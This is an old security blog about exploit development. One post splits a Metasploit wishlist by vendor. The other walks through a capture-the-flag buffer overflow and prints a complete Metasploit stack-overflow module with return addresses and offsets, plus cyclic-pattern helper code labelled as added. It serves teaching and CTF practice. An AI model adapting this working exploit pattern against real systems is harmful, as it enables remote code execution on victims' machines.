Tuesday, February 15, 2011

from exploit db to metasploit

A couple of days ago, mubix posted on Twitter a very nice link to http://cosine-security.blogspot.com/2011/02/metasploit-framework-wishlist.html . I got a few minutes today to split the list a bit further, so anybody who wants to work on it can find things more easily. The list is split by affected vendor into the following files:

adobe
apple
centos
cisco
debian
fedora
google
hp
ibm
java
linux
microsoft
mozilla
oracle
others
php
proftpd
red_hat
solaris
suse
ubuntu
winamp

Over the next few days I'm thinking of starting to port some of them to Metasploit modules; anybody who wants to do the same, feel free to choose what you'd like to work on :)

The list split by vendor is at http://chaos.deventum.com/research/0entropy.zip

Wednesday, February 9, 2011

From vulnerability to exploit under 5 min

Almost a month ago, in the excellent NOVA Hackers group ( http://novahackers.blogspot.com/ ), a group of security professionals, security enthusiasts and friends, a capture the flag challenge was posted. In that challenge one should find a way to exploit a binary ( http://novactf.org/files/ctf-january-2011-files.rar ) that listens on a specific port, and write a Metasploit exploit module. The CTF challenge was not meant to be extremely difficult; it was meant to be for fun. Let's see how, using the proper tools, one can write a Metasploit exploit module in under 5 minutes.

Tools that you will need, and tools that I like to work with:
Immunity Debugger ( http://www.immunityinc.com/products-immdbg.shtml )
Pvefindaddr ( http://redmine.corelan.be:8800/projects/pvefindaddr )
Metasploit Framework ( http://www.metasploit.com/framework/download/ )

Let's see how simple it can be to write a simple buffer overflow exploit with the proper tools.

Phase 1.
Fire up the debugger and open the file.
Phase 2.
Start the executable from the debugger by pressing F9 or the run button.

Phase 3.
Generate a string of characters with Metasploit and send it to crash the application.
Phase 4.
At this point the application has crashed and the debugger displays an Access Violation; luckily for us, several registers have also been overwritten with our string.
Phase 5.
Pvefindaddr to the rescue! Writing an exploit with the help of pvefindaddr is almost considered cheating, so let's make it quick: execute !pvefindaddr suggest in the debugger and check the log for the results.
What else could we ask from the tool, maybe to write the Metasploit module by itself and post it on exploit-db.com :-)
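The string sent in Phase 3 is a cyclic pattern, and the offset that Phase 4 reads off the overwritten registers comes from looking the register value up in that pattern. Below is an added example of both steps in plain Ruby; it is not code from the post and not Metasploit's own pattern_create.rb / pattern_offset.rb, though it follows the same "Aa0Aa1Aa2..." scheme. The function names pattern_create and pattern_offset and the sample register value 0x37694136 are constructed for this example.

```ruby
# Metasploit-style cyclic pattern ("Aa0Aa1Aa2...") for locating the offset
# at which a crash input lands in a register. Added example, not the post's
# code; the names and sample values are constructed.

UPPER = ('A'..'Z').to_a
LOWER = ('a'..'z').to_a
DIGIT = ('0'..'9').to_a

# Build a non-repeating pattern of the given length. Windows start with an
# upper-case letter, a lower-case letter or a digit depending on their
# position inside a triplet, so no 4-byte window repeats within the full
# 26*26*10*3 = 20280-byte pattern and a register value maps to one offset.
def pattern_create(length)
  buf = +''
  UPPER.each do |u|
    LOWER.each do |l|
      DIGIT.each do |d|
        buf << u << l << d
        return buf[0, length] if buf.length >= length
      end
    end
  end
  raise ArgumentError, "length #{length} exceeds the #{buf.length}-byte pattern"
end

# Find where +value+ sits in a pattern of +length+ bytes. +value+ may be a
# 32-bit register value as the debugger shows it (it is re-packed
# little-endian, the way it sat in memory) or a short string. Returns nil
# when the value did not come from the pattern, e.g. a genuine code address.
def pattern_offset(value, length)
  pat = pattern_create(length).b
  needle = value.is_a?(Integer) ? [value].pack('V') : value.to_s.b
  pat.index(needle)
end

if __FILE__ == $0
  puts pattern_create(24)
  # Constructed register value: the 4 bytes found at offset 260 of the
  # pattern, read little-endian as EIP would appear after the crash.
  puts pattern_offset(0x37694136, 300)   # 260
end
```

A value that is not found (nil) usually means the register holds a real address rather than bytes from the buffer, so it is not the one to use for the 'Offset' value.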

Phase 6.
Take the data and put it in a nice Metasploit module. What is left is a proper jmp eax instruction; pvefindaddr again will give us what we need.
Phase 7.
Take a simple Metasploit exploit template ( http://www.corelan.be:8800/index.php/2009/08/12/exploit-writing-tutorials-part-4-from-exploit-to-metasploit-the-basics/ ) or any other module in the Metasploit directory, add your values and you are done!

#
# Custom metasploit exploit
# Written by Nicolas Krassas
# Date 24/01/2011
# This is initial version
#
require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote

  include Msf::Exploit::Remote::Tcp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'Custom vulnerable server stack overflow',
      'Description'    => %q{
        This module exploits a stack overflow in a
        custom vulnerable server.
      },
      'Author'         => [ 'Nicolas Krassas' ],
      'Version'        => '$Revision: 9999 $',
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process',
        },
      'Payload'        =>
        {
          'Space'    => 1000,
          'BadChars' => "",
        },
      'Platform'       => 'win',

      # 'Offset' is the number of bytes before the saved return address,
      # found from the crash in Phase 4; 'Ret' is the address of the
      # jmp eax instruction suggested by pvefindaddr in Phase 6.
      'Targets'        =>
        [
          ['Windows XP SP2 Eng',
            { 'Ret' => 0x662F3435, 'Offset' => 260 } ],
          ['Windows XP SP3 Eng',
            { 'Ret' => 0x662F3425, 'Offset' => 260 } ],
        ],
      'DefaultTarget' => 0,

      'Privileged'     => false
      ))

    register_options(
      [
        Opt::RPORT(1337)
      ], self.class)
  end

  def exploit
    connect

    # Buffer layout: filler up to the return address, the jmp eax address
    # packed little-endian, a small NOP pad, then the encoded payload.
    junk = make_nops(target['Offset'])
    sploit = junk + [target.ret].pack('V') + make_nops(4) + payload.encoded
    sock.put(sploit)

    handler
    disconnect
  end
end

Did it take 5 minutes? Maybe not, but it's not far from it. Another nice tutorial on Metasploit exploit code development using pvefindaddr is from sickness: Exploit Development Made Easy with !pvefindaddr.